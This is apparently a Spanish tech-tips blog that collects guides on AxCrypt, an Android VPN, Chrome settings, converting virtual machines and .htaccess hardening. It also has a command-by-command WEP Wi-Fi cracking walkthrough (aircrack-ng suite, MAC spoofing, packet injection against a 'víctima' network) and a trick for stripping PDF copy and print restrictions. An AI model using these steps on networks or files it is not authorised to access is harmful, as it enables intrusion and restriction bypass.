Codificar y decodificar ficheros mediante AxCrypt

AxCrypt es un programa que nos permite básicamente codificar/decodificar y borrar de forma segura ficheros
de nuestro sistema.

Este programa nos permite de forma simple codificar un fichero y crear a partir del mismo un fichero ejecutable  que se puede decodificar en otro equipo, aunque no tenga instalado el programa. Hay que señalar que utiliza  cifrado de clave simétrica (emisor y destinatario deben conocer la clave), lo que lo hace seguro.

Es un programa muy ligero, incrementa poco el tamaño del fichero cifrado, y está disponible desde el menú contextual (clic derecho). La última opción del menú contextual es el idioma, está en varios, entre ellos el español.

Enlace de descarga PDF: AxCrypt-Manual-Spanish.pdf

Puedes descargar el software gratuitamente desde aquí

 

Conexión a una red publica de manera segura mediante una VPN en android

Para crear una conexión a una red publica de manera segura mediante una VPN en android , es hacerlo desde alguna de las  que hay disponibles para instalar  en tu smartphone o tablet.

Esta app se encargará de conectar con el servidor VPN, permitiendo crear una conexión segura y anónima.

Para ello en nuestro caso instalamos Spotflux free VPN en nuestro dispositivo.  Para nuestro ejemplo utilizamos la version deAndroid, aunque también está disponible para los dispositivos de Apple.

Buscamos e instalamos en  la app SpotFlux free VPN en Google Play, iniciamos la aplicación. Desplazamos la pantalla hacia la izquierda y pulsamos en Proceed. Como necesitamos crear una nueva conexión de red, nos preguntará si la app está autorizada para ello señalamos la opción Confío en esta aplicación y pulsamos en Aceptar.

Automáticamente se conectará a los servidores de Spotflux y se cifrará nuestra conexión. Un icono en la barra de notificaciones nos indicará que la conexión VPN está activa.

Tras el periodo inicial de prueba, se bloquearán las funciones Premium, pero podremos seguir utilizando las demás funciones con toda normalidad. Para desconectarse delservidor VPN de Spotflux, pulsa sobre el botón Disable.

 

 

 

vpn en android

Desproteger un archivo PDF

Para desbloquear nuestro archivo PDF facilmente

  1. Cargamos el archivo PDF en nuestro navegador, para ello abrimos Firefox. Este debe estar maximizado, debemos ver el archivo PDF que queremos desproteger el navegador. Ahora arrastramos el PDF dentro de la ventana del navegador:
    desproger PDF con firefox
    Esto hará que nuestro navegador abra el archivo PDF y  podamos visualizarlo. Tenemos que hacerlo así porque si abrimos el archivo PDF con acrobat reader (el visualizador de archivos PDF por defecto) aplicará las restricciones del archivo y no nos dejará imprimirlo en nuevo PDF, que es lo que vamos a realizar en el segundo paso.
  2. Imprimimos el archivo PDF protegido abierto con Firefox en un nuevo PDF con la impresora PDF. Esta tarea es igual de sencilla que la primera; seleccionamos en el navegador la opción de imprimir:
    Imprimir PDF protegido
    Nos  aseguramos de que en la impresora hemos elegido es PDFCreator, en el tuyo puede ser esa u otra cualquiera que ya tuvieras instalada de antes.Cuando la tengamos seleccionada aceptamos y nos genera un archivo pdf, que ya estará DESPROTEGIDO y solo falta guardarlo
  3. Y listo, al pulsar sobre la opción de guardar la impresora PDF generará un nuevo archivo PDF con el mismo contenido que tenía el archivo PDF protegido inicialmente pero sin protección alguna, ya tienes tu archivo desprotegido para que puedas copiar, pegar, imprimirlo, etc…

Recuperar la configuración del navegador Chrome

Paso 1: Limpiador de Chrome

Para localizar y eliminar software no deseado, puedes descargar y ejecutar el Limpiador de Chrome. Esta aplicación busca programas sospechosos en tu ordenador y solicita permiso para eliminarlos.

Más información sobre el Limpiador de Chrome y el contenido que elimina

Paso 2: Elimina programas maliciosos con el antivirus del ordenador

Si has comprado o descargado software antivirus, puedes ejecutar el programa para localizar y eliminar programas dañinos.

Paso 3: Restablece la configuración del navegador

Después de eliminar los programas maliciosos del ordenador, restablece la configuración del navegador Chrome. Los marcadores y contraseñas no se modificarán, pero deberás personalizar elementos como la página de inicio, el motor de búsqueda y el tema del navegador.

  1. Haz clic en el menú de Chrome Chrome menu situado en la esquina superior derecha de la ventana del navegador.
  2. Selecciona Configuración.
  3. En la parte inferior, haz clic en Mostrar opciones avanzadas.
  4. En la sección «Restablecer configuración», haz clic en Restablecer configuración.
  5. En el cuadro de diálogo que aparece, haz clic en Restablecer.

Permitir ventanas emergentes de un sitio web

  1. Abre Chrome.
  2. Busca una página que tenga las ventanas emergentes bloqueadas.
  3. Haz clic en el icono del bloqueador de ventanas emergentes chrome pop-up blocked que aparece al final de la barra de direcciones.
  4. Haz clic en el enlace de la ventana emergente que quieras ver.
  5. Si quieres que aparezcan siempre las ventanas emergentes de un sitio web, selecciona la opción Permitir siempre pop-ups de [sitio].

Puedes cambiar esta opción en cualquier momento. Para ello, sigue los pasos anteriores y desactiva la opción «Permitir siempre pop-ups de [sitio]».

Bloquear o habilitar ventanas emergentes en Chrome

Ordenador
  1. Abre Chrome.
  2. En la esquina superior derecha, haz clic en el menú de Chrome Chrome menu.
  3. Haz clic en Configuración.
  4. Haz clic en Mostrar opciones avanzadas.
  5. En la sección «Privacidad», haz clic en Configuración de contenido.
  6. En «Pop-ups» selecciona No permitir que ningún sitio muestre pop-ups (recomendado) o Permitir que todos los sitios muestren pop-ups.
Android
  1. Abre la aplicación Chrome Chrome for iOS.
  2. Toca el menú de Chrome Menu.
  3. Toca Ajustes > Configuración del sitio.
  4. Toca Pop-ups y, a continuación, activa o desactiva esta opción.

Comprobar la seguridad de una red wifi hackeandola.

Comprobar la seguridad de una red wifi hackeandola.

La siguiente entrada en este blog solo tiene como objeto el comprobar si la clave wifi de nuestra red es lo suficiente segura por lo utilización por lo que no es mi resposabilidad su mala utilización.

Necesitamos:

Una interfaz de red inalámbrica (Wifi).
Tener BackTrack 5

No me digas: y un poco de conocimiento en GNU/Linux (saber usar la Terminal)

Primero vamos a la pagina de descarga de BackTrack 5

BackTrack Download

Escojemos la  versión: Yo elegí Backtrack 5 R3
Windows Manager (manejador de vetanas): Yo elegí gnome, ya que para mi es mas cómodo
Escogemos nuestra  arquitectura: Mi arquitectura es de 32bits
Tipo de Imagen: ISO (100% Recomendable)
Tipo de descarga: Directo (Descarga Directa)

Backtrack 32 bits 3,3Gb

BackTrack 64 bits 3.1Gb
Booteamos Backtrack 5

USB Mínimo 4 Gb
DVD Mínimo 4.7 Gb

Programa para bootear en una Pendrive podemos usar linuxLiveUSB Home LinuxLiveUsb o UNetbootin Home UNetbootin

1.- Aquí escogerán la distribución a instalar, en este caso es BackTrack 5.
2.- Elegirán la versión de la distribución.
3.- Selecciona la ruta donde se encuentra la imagen ISO de BackTrack 5.
4.- Selecciona el tipo de unidad, puede ser un Pendrive o un Disco duro.
5.- Selecciona la letra de la unidad.
6.- Esta opción se seleccionara automáticamente al hacer todo bien.
7.- Ahora dan clic en aceptar y comenzara la instalación en la memoria, después de unos minutos el proceso terminara y ya podemos ejecutar el Backtrack 5 desde una Memoria USB.

Programa para bootear en una DVD se puede usar  nero u otro

Todos los siguiente pasos se ejecutan en un terminal con privilegios de administrador.

1. Paso: Saber el nombre de nuestra interface (Targeta Wireless) para colocarla en Modo Monitor, para esto abrimos una terminal y escribimos lo siguiente:

airmon-ng
Y nos aparecerá el nombre de nuestra interfaz, el chipset y el driver en mi caso es una el nombre de la interfaz es Wlan0

2. Paso: Ya qué conocemos el nombre de nuestra interfaz procedemos a ponerla en Modo Monitor y escribimos lo siguiente:

airmon-ng start wlan0
Ya tenemos nuestra targeta en Modo Monitor (monitor mode enabled on mon0) se podrán dar cuenta «mon0» es el nombre de la interfaz en modo monitor.

3. Paso: Ahora vamos a escanear redes disponibles con el siguiente comando:

airodump-ng mon0
y con esto comenzará a mostrarnos las Redes Disponibles. Para seleccionar la Red Víctima tenemos qué detener el escaneo presionando ctrl+c

4. Paso: En este paso vamos a Capturar la Red Víctima para esto escribimos el siguiente comando:

airodump-ng -w redes -c 11 –bssid 00:22:A4:30:FE:59 mon0     esto son los datos de la red a a comprobar
donde

-w = especifica el nombre del archivo donde se guarda la captura de datos
-c = especifica el canal de la Red
–bssid = especifica Mac de Punto de Acceso
mon0 = especifica la interfaz de la targeta de Red en Modo Monitor

5. Paso: Abrimos una segunda Terminal (sin cerrar la primera) y escribimos lo siguiente:

aireplay-ng -1 0 -a 00:22:A4:30:FE:59 mon0
esto es para Asociar su pc con la Red Víctima

6. Paso: Ahora si viene lo bueno, a inyectar paquetes a la red, para esto tecleamos lo siguiente:

aireplay-ng -3 -b 00:22:A4:30:FE:59 mon0
con esto enviaremos y recibiremos paquetes. Vamos a la primera Terminal y en la columna #Data se incrementará rapidamente, y esperamos a que llegue a los 30,000 datos para poder desemcriptar la Clave

7. Paso: Cuando llegue a los 30,000 datos abrimos una tercera y última Terminal y escribimos el famoso comando:

aircrack-ng redes-01.cap
redes =archivo donde se guarda la captura (.cap) el mismo qué mencionamos en el paso 3

damos enter y empezará a decifrar a la clave y Vualá Clave desemcriptada

Key Found¡……………………

 

 

Otra manera pero partiendo de Backtrack 4

Escribimos en la terminal.

airmon-ng

Después de identificada nuestra interfaz hacemos lo siguiente (en mi caso es wlan0), en la misma ventana ponemos

airmon-ng stop wlan0
y después

airmon-ng start wlan0
espués de eso, cambiamos la macaddress de nuetro dispositivo ponemos lo siguiente:

macchanger –m 00:11:22:33:44:55 wlan0
Con lo anterior le cambiamos la macaddress de manera temporal a la USB wireles Linksys WUSB54GC para que sea mas fácil de recordar.

Después de eso en la misma consola ponemos lo siguiente

airodump-ng wlan0
Para escanear las redes que tenemos a nuestro alrededor

Donde vemos lo siguiente (estos datos son imaginarios y pertenecería a la red en la que queremos comprobar sus seguridad).  Tenemso  que la red es adriana70 y nos  fijamos en los siguientes datos el channel (Columna CH) y en la macaddress de nuestra víctima(columna BSSID) estos datos están señalados en la imagen anterior.

Ahora en esa misma ventana precionamos ctrl+c, aparecera la linea de comando y ponemos la siguiente instrucción teniendo precaución de sustituir los datos entre comillas con la información de nuestra víctima.

view plaincopy to clipboardprint?
airodump-ng -c «channel» -w guerrix –bssid «mac-a-atacar» wlan0
para el caso de mi víctima quedaría así:

airodump-ng -c 10 -w guerrix –bssid 00:1D:5A:19:05:11 wlan0
Donde “channel” lo sustituí por 10 y “mac-a-atacar” por 00:1D:5A:19:05:11, los datos de la red a coprobar.
El recuadro en rojo debajo de #DATA indica la cantidad de paquetes que hemos inyectado probablemente lo tengan en 0 o un numero demasiado bajo para cambiar eso hacemos lo siguiente:

Abrimos una nueva terminal sin cerrar la que teníamos, ponemos el siguiente comando teniendo cuidado de sustituir el texto entre comillas con los datos indicados:

view plaincopy to clipboardprint?
aireplay-ng -1 0 -a «mac-a-tacar» -h «mi-mac» wlan0
Recuerden que al principio cambiamos nuestra mac por 00:11:22:33:44:55

aireplay-ng -1 0 -a 00:1D:5A:19:05:11 -h 00:11:22:33:44:55 wlan0
al dar enter y si no tenemos ningun error ponemos el siguiente comando de igual manera teniendo cuidado de sustituir el texto entre comillas con los datos indicados:

view plaincopy to clipboardprint?
aireplay-ng -3 -b «mac-a-tacar» -h «mi-mac» wlan0
En mi caso quedara:

aireplay-ng -3 -b 00:1D:5A:19:05:11 -h 00:11:22:33:44:55 wlan0
Al dar enter a esta ultima instrucción notaremos que empezamos a inyectar los paquetes y si checamos la terminal que nos indica el #DATA veremos como ese valor se incrementa rápidamente:

 

Una vez que el valor de #DATA pase los 30000 paquetes abrimos otra terminal, sin cerrar las que tenemos abiertas y ponemos lo siguiente:
Nuevamente cuidado de sustituir lo que nos pide.

view plaincopy to clipboardprint?
aircrack-ng -b «mac-a-atacar» guerrix-01.cap
En mi caso quedara así:

aircrack-ng -b 00:1D:5A:19:05:11 guerrix-01.cap
Después de dar enter si obtenemos un KEY FOUND! entonces felicidades han hackeado la red.
Pero de no ser asi no se mortifiquen esperen a que el #DATA incremente a 60000 e ingrecen de nuevo el comando anterior y si sigue fallando intenten a los 90000 y así dejen que se valla incrementando hasta que encuentren la clave. El tiempo que se emplee en descifrar la clave varia según la dificultad de esta ultima.

Pasar una maquina virtual de Virtualbox a Vmware

Pasar una maquina virtual de Virtualbox a Vmware.

Si tenemos una máquina en virtualbox y por alguna razón hemos de pasarla a vmware el proceso consiste en  convertir el formato de las imágenes para que lo reconozca Vmware, para esa tarea utilizaremos Quemu.

Para instalarlo en un terminal con privilegios de administrador escribimos:

$sudo apt-get install qemu

Una vez instalado para combertir una determinada imagen escribimos

$qemu-img convert SistemaOperativo.vmdk /tmp/SistemaOperativo.bin

Ahora utilizamos VirtualBox Manage para convertir la imagen de .bin a .vdi

$VBoxManage convertdd /tmp/debian.bin debian.vdi

Si quisiéramos hacerlo de manera inversa osea convertir de Virtualbox a Vmware primero convertimos el archivo de .vdi a .raw

$vboxmanage internalcommands converttoraw debian.vdi debian.raw

y luego utilizamos Qemu para pasarlo a .vmdk

$qemu-img convert -O vmdk debian.raw debian.vmdk

Métodos para asegurar nuestro blog o web

Métodos para asegurar nuestro blog o web mediante .htaccess

Podemos asegurar nuestra web o blog mediante el archivo .htaccess que podemos crearlo y subirlo a nuestro servidor con las estas configuraciones.

En primer lugar hemos de saber que cuando alguien visita su sitio el servidor web Apache verifica si tiene un archivo .htaccess en algún lugar de su espacio web a partir de la carpeta raíz o la carpeta principal y rastrea todas las carpetas hasta llegar al archivo solicitado. Si encuentra un archivo .htaccess, sus directivas se aplican a la solicitud actual.

Es importante saber que el archivo .htaccess debe ser legible por el servidor Apache. Por tanto es importante consultar con su Hosting si se requiere algún permiso especial que hayan establecido para los archivos .htaccess. En general los permisos correctos para este archivo son 644.

Para ello solo hemos de editar .htaccess y escribir en el las lineas en que menciono a continuación en negrita.

Impedir listar el directorio

Si tiene una carpeta en el servidor web utilizada para almacenar archivos como los e-docs, software legal, etc,, si la carpeta no tiene archivo index.html, los visitantes pueden ver todos los archivos dentro de la carpeta sin problemas. En este caso puede utilizar el código siguiente para evitar que esto suceda.

Options -Indexes

Orden de ejecución de archivos

Si tiene tanto el archivo index.html como el archivo index.php en la carpeta /public_html, el archivo index.html tiene mayor prioridad y se ejecutara en primer lugar. Aunque la mayoría de scripts web utilizan el archivo index.php como punto de partida. Si se puede eliminar el archivo index.html, se soluciona el problema, aunque no siempre es asi y en estos casos hay una mejor solución que es utilizar el siguiente código para dar prioridad al archivo index.php en vez de index.html.

DirectoryIndex index.php index.html

Comprimir archivos CSS, JavaScript, XML y texto

El siguiente código está diseñado para comprimir el código de salida CSS, JavaScript, XML y de texto antes de ser mostrado en el navegador. La idea básica es ahorrar tiempo en la carga y no consumir tanto ancho de banda.

AddOutputFilterByType DEFLATE text/html text/plain text/xml text/css text/javascript application/x-javascript

Almacenamiento en caché de imágenes para acelerar su visionado.

Cada vez que recibimos visitas en la web, el servidor web obtiene todos los archivos necesarios, tales como archivos CSS y JavaScript, así como fotos e imágenes para poder mostrarla. Podemos usar el código de abajo para gestionar los archivos de caché, y que cuando un visitante vuelva a visitarnos por segunda vez, el servidor cargue el archivo de la caché lo que acelerará el tiempo de carga sitio web.

ExpiresActive On
ExpiresByType image/gif A432000
ExpiresByType image/jpg A432000
ExpiresByType image/jpeg A432000
ExpiresByType image/png A432000
ExpiresByType image/ico A432000
ExpiresByType image/bmp A432000
ExpiresByType text/css A432000
ExpiresByType text/javascript A432000
ExpiresByType application/javascript A432000
ExpiresByType application/x-javascript A432000

El código anterior guarda caché de los archivos durante cinco días o 432.000 segundos. Puede cambiar el período de almacenamiento en caché, asegurándose de utilizar el valor expresado en segundos.

Proteger el archivo .htaccess

El siguiente código evita que su archivo .htaccess puedan ser leído directamente desde el navegador web.

order allow,deny
deny from all

Prevenir el hotlinking

A veces, otros webmasters, hacen suyas las imágenes de nuestras webs, artículos, etc., afectando con ello el ancho de banda de que disponemos en nuestro Hosting. Si ademas ellos tienen una gran cantidad de visitantes al día, estos van a utilizar nuestro ancho de banda del servidor para visualizar nuestras imagenes en la web ajena a nosotros. Se puede utilizar el código que se muestra a continuación para evitar el hotlinking, y de esta forma reemplazar la imagen original por otra con algún aviso para hacerles saber que la imagen es nuestra o que el hotlinking es una mala práctica.

RewriteEngine On
RewriteCond %{HTTP_REFERER} !^http://(.+\.)?webempresa\.com/ [NC]
RewriteCond %{HTTP_REFERER} !^$
RewriteRule .*\.(jpg|gif|bmp|png)$ http://hotlink.webempresa.com/no_se_permite_hotlinking.jpg [L]

Puede subir la imagen a un sitio de alojamiento de imágenes como ImageShack para evitar que su ancho de banda se vea afectado.

Cambiar la ubicación de la carpeta de dominio a otra carpeta de /public_html

Si ya tiene un sitio web en el /public_html, y quiere actualizar la página web, pero no quiere que los demás lo vean, pero tampoco quiere afectar al sitio web en producción existente, la forma más fácil es la construcción de la nueva página web en una subcarpeta de /public_html, por ejemplo, /public_html/web2.

Al finalizar todas las pruebas y mejoras, quiere reemplazar el antiguo sitio web con el nuevo pero transferir archivos y carpetas a la carpeta /public_html es bastante molesto. La mejor solución es usar.htaccess para decirle a Apache que utilice la carpeta /public_html/web2 en lugar de /public_html para el dominio.

RewriteEngine On
RewriteCond %{HTTP_HOST} ^webempresa\.com$ [OR]
RewriteCond %{HTTP_HOST} ^www\.webempresa\.com$
RewriteCond %{REQUEST_URI} !^/web2/
RewriteRule (.*) /web2/$1 [L]

Crear URLs de uso fácil o «amigables»

¿Cuál de las dos URL a continuación parece más amigable?

http://tusitio.com/acercade
http://tusitio.com/paginas/acercade.html

Cuando se trata de direcciones URL, siempre y cuando el significado sea claro, cuanto más corto es, mejor. htaccess con una llamada al módulo de Apache mod_rewrite permite configurar las direcciones URL como quieras. El servidor puede mostrar el contenido de «/paginas/acercade.html» cada vez que alguien visita «http://tusitio.com/acercade».

A continuación algunos ejemplos:

RewriteEngine on
RewriteRule ^acercade/$ /paginas/acercade.html [L]
RewriteRule ^caracteristicas/$ /caracteristicas.php [L]
RewriteRule ^comprar/$ /comprar.html [L]
RewriteRule ^contacto/$ /paginas/contacto.htm [L]

Forzar el uso de SSL

Este código fuerza a utilizar SSL, no permitiendo conexiones http. Para evitar escuchas en http:// utilizamos por debajo la directivaErrorDocument.

SSLOptions + StrictRequire
SSLRequireSSL

Si una línea comienza por # es un comentario que no tiene ningún efecto.

Estas apenas son unas pinceladas de las muchas posibilidades que tiene la correcta gestión del archivo .htaccess.

 

Redirigir dominios sin www a otros con www

Redirigir dominios sin www a otros con www.

Para ello utilizamos el archivo .htccess  el  cual hemos de poner en la carpeta que queremos que se vea afectada por el, en este caso en www de nuestro servidor apache. Solo hemos de copiar el siguiente contenido según queramos que se redirija de www a sin www o al contrario.

Redirigir la URL sin www a la dirección con www

Como explique anteriormente, el siguiente código redirigirá de la URL de su dominio sin www a la URL de su dominio con www.

RewriteEngine On
RewriteCond %{HTTP_HOST} ^webempresa.com
RewriteRule (.*) http://www.webempresa.com/$1 [R=301,L]

Como cambiar de la URL www para la dirección URL sin www

Y el siguiente código debe redirigir al usuario de la dirección URL de su dominio con www a la dirección URL sin www.

RewriteEngine On
RewriteCond %{HTTP_HOST} ^www.webempresa.com [NC]
RewriteRule ^(.*)$ http://webempresa.com/$1 [L,R=301]